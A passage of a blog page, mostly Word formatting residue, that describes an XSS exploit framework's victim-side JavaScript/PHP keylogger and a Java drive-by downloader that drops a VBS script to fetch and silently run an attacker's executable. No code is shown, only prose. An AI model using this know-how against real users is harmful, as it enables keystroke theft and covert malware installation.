both; text-align: center;"><a href="http://oi45.tinypic.com/28upute.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="http://oi45.tinypic.com/28upute.jpg" width="400" /></a></div><br /><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP.<span style="mso-spacerun: yes;">  </span>PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file. </span></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML/> <o:AllowPNG/> </o:OfficeDocumentSettings></xml><![endif]--></span></b></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0in; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style><![endif]--> </span></b></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[VIDEO] <a href="https://www.youtube.com/watch?v=owfF9C_Xerw">https://www.youtube.com/watch?v=owfF9C_Xerw</a> [/VIDEO]</span></b></b></div><b style="mso-bidi-font-weight: normal;">  </b><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Executable Drive-by Downloader</span></b></b></h4><div class="separator" style="clear: both; text-align: center;"><b style="mso-bidi-font-weight: normal;"><a href="http://oi45.tinypic.com/4q565v.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="http://oi45.tinypic.com/4q565v.jpg" width="400" /></a></b></div><div class="MsoNormal"><br /></div><b style="mso-bidi-font-weight: normal;">  </b><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim. </span></div><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><br /></span></b></div><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b><br /><div class="MsoNormal"></div><div class="MsoNormal"><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" 